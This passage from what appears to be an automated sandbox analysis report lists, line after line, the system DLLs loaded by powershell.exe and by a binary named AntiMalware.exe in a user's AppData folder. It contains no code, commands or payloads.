                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cryptnet.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: webio.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cabinet.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: sxs.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: devenum.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: devobj.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: msdmo.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
